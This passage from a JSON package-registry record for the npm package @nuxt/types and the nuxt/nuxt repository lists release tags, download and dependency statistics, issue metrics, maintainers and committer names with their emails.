osyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:55.367Z","dependent_packages_count":607,"downloads":573473,"downloads_period":"last-month","dependent_repos_count":14274,"rankings":{"downloads":0.29942325311460405,"dependent_repos_count":0.21743898165843512,"dependent_packages_count":0.09898613437857912,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":0.5132209791224406,"average":0.301327162548057},"purl":"pkg:npm/%40nuxt/types","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/types","docker_dependents_count":102,"docker_downloads_count":326133,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/types","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/types/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-10T10:55:32.678Z","updated_at":"2022-11-10T10:55:32.678Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-10T10:55:32.664Z","updated_at":"2022-11-10T10:55:32.664Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-10T10:55:32.671Z","updated_at":"2022-11-10T10:55:32.671Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-10T10:55:32.692Z","updated_at":"2022-11-10T10:55:32.692Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:39.660Z","updated_at":"2023-08-19T18:25:39.660Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}}],"commits":{"id":67,"full_name":"nuxt/nuxt","default_branch":"main","total_commits":13833,"total_committers":1200,"total_bot_commits":2825,"total_bot_committers":4,"mean_commits":11.5275,"dds":0.7914407576086171,"past_year_total_commits":1470,"past_year_total_committers":165,"past_year_total_bot_commits":381,"past_year_total_bot_committers":3,"past_year_mean_commits":8.909090909090908,"past_year_dds":0.6108843537414965,"last_synced_at":"2025-11-05T22:17:20.999Z","last_synced_commit":"6b6ea5faa1bcea7ad27ab1203e15b1d4e07eda99","created_at":"2023-03-06T22:03:56.313Z","updated_at":"2025-11-05T21:22:50.871Z","committers":[{"name":"Daniel Roe","email":"daniel@roe.dev","login":"danielroe","count":2885},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":2779},{"name":"Pooya Parsa","email":"pyapar@gmail.com","login":"pi0","count":1230},{"name":"Sébastien Chopin","email":"seb@chopin.io","login":"atinux","count":1180},{"name":"Pooya Parsa","email":"pooya@pi0.ir","login":null,"count":1001},{"name":"Clark Du","email":"clark.duxin@gmail.com","login":"clarkdo","count":941},{"name":"Anthony Fu","email":"anthonyfu117@hotmail.com","login":"antfu","count":274},{"name":"Julien Huang","email":"julien.huang@outlook.fr","login":"huang-julien","count":218},{"name":"Alexander Lichter","email":"manniL@gmx.net","login":"manniL","count":179},{"name":"Clément Ollivier","email":"clement.o2p@gmail.com","login":"clemcode","count":96},{"name":"Atinux","email":"sebastien.chopin@neo9.fr","login":null,"count":85},{"name":"Pim","email":"pimlie@hotmail.com","login":"pimlie","count":81},{"name":"Alex Liu","email":"dsa1314@gmail.com","login":"Mini-ghost","count":73},{"name":"Damian Głowala","email":"damian.glowala.rebkow@gmail.com","login":"DamianGlowala","count":71},{"name":"Alexandre Chopin","email":"wikeo65@gmail.com","login":"alexchopin","count":61},{"name":"Harlan Wilton","email":"harlan@harlanzw.com","login":"harlan-zw","count":60},{"name":"Kevin Marrec","email":"kevin@marrec.io","login":"kevinmarrec","count":56},{"name":"Jonas Galvez","email":"jonasgalvez@gmail.com","login":"galvez","count":50},{"name":"@beer","email":"47961062+iiio2","login":"iiio2","count":46},{"name":"Ahad Birang","email":"farnabaz@gmail.com","login":"farnabaz","count":45},{"name":"Dmitry Molotkov","email":"aldarund@gmail.com","login":"aldarund","count":45},{"name":"github-actions[bot]","email":"41898282+github-actions[bot]","login":"github-actions[bot]","count":44},{"name":"xjccc","email":"546534045@qq.com","login":"xjccc","count":41},{"name":"Bobbie Goede","email":"bobbiegoede@gmail.com","login":"BobbieGoede","count":36},{"name":"Michael Brevard","email":"yonshi29@gmail.com","login":"GalacticHypernova","count":31},{"name":"Ricardo Gobbo de Souza","email":"ricardogobbosouza@yahoo.com.br","login":"ricardogobbosouza","count":31},{"name":"Matej Černý","email":"matej.cern@gmail.com","login":"cernymatej","count":28},{"name":"Ryota Watanabe","email":"43837308+wattanx","login":"wattanx","count":20},{"name":"Krutie Patel","email":"krutie.patel@gmail.com","login":"Krutie","count":18},{"name":"Rafał Chłodnicki","email":"rchl2k@gmail.com","login":"rchl","count":17},{"name":"山吹色御守","email":"85992002+KazariEX","login":"KazariEX","count":17},{"name":"Robin","email":"robin.kehl@singular-it.de","login":"OrbisK","count":17},{"name":"Maxime Pauvert","email":"maximepvrt@gmail.com","login":"maximepvrt","count":16},{"name":"HomWang","email":"516310460@qq.com","login":"HomWang","count":15},{"name":"Tobias Diez","email":"code@tobiasdiez.com","login":"tobiasdiez","count":15},{"name":"Inesh Bose","email":"56732164+ineshbose","login":"ineshbose","count":13},{"name":"webfansplz","email":"308241863@qq.com","login":"webfansplz","count":13},{"name":"Hebilicious","email":"xsh4k3@gmail.com","login":"Hebilicious","count":13},{"name":"Luke Nelson","email":"luke@nelson.zone","login":"luc122c","count":13},{"name":"Florent Delerue","email":"florentdelerue@hotmail.com","login":"Flosciante","count":12},{"name":"Joaquín Sánchez","email":"userquin@gmail.com","login":"userquin","count":12},{"name":"HG","email":"husayt@gmail.com","login":"husayt","count":12},{"name":"Dizzy","email":"19627670+Diizzayy","login":"Diizzayy","count":12},{"name":"Renovate Bot","email":"bot@renovateapp.com","login":"renovate-bot","count":11},{"name":"Lehoczky Zoltán","email":"ifjlehoczkyzoltan@gmail.com","login":"Lehoczky","count":11},{"name":"Horu","email":"73709188+HigherOrderLogic","login":"HigherOrderLogic","count":11},{"name":"Sébastien Chopin","email":"seb@orion.sh","login":null,"count":11},{"name":"Johan Roxendal","email":"johan@roxendal.com","login":"jroxendal","count":11},{"name":"Florian Heuberger","email":"10813063+Flo0806","login":"Flo0806","count":10},{"name":"airjp73","email":"aaron.pettengill.violin@gmail.com","login":"airjp73","count":10},{"name":"Alexandre Chopin","email":"alex@orion.sh","login":null,"count":10},{"name":"Levi (Nguyễn Lương Huy)","email":"huy.nguyen.luong96@gmail.com","login":"huynl-96","count":10},{"name":"Mehmet","email":"hi@productdevbook.com","login":"productdevbook","count":9},{"name":"Andrey Yolkin","email":"andreyyolkin@gmail.com","login":"AndreyYolkin","count":9},{"name":"John Tanzer","email":"82201261+moshetanzer","login":"moshetanzer","count":9},{"name":"dojineko","email":"dojineko.spiral@gmail.com","login":"dojineko","count":9},{"name":"Wu 